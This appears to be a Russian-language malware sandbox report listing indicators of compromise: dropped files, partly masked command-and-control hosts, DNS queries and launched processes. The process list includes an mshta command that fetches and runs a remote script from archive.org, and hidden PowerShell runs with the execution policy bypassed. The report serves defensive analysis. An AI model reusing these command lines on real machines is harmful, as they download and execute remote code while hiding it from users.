Техническая информация
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- C:\users\public\datax.ps1
- C:\users\public\data\idm.bat
- 'ar##ive.org':443
- 'cr#.#odaddy.com':80
- 'microsoft.com':80
- 'cl#####eb.publicvm.com':777
- http://cr#.#odaddy.com/gdroot-g2.crl
- DNS ASK ar##ive.org
- DNS ASK cr#.#odaddy.com
- DNS ASK microsoft.com
- DNS ASK ia#####5.us.archive.org
- DNS ASK ia#####4.us.archive.org
- DNS ASK ia#####1.us.archive.org
- DNS ASK cl#####eb.publicvm.com
- '<SYSTEM32>\mshta.exe' https://archive.org/download/startup_20210316/startup.txt' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' https://archive.org/download/startup_20210316/startup.txt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'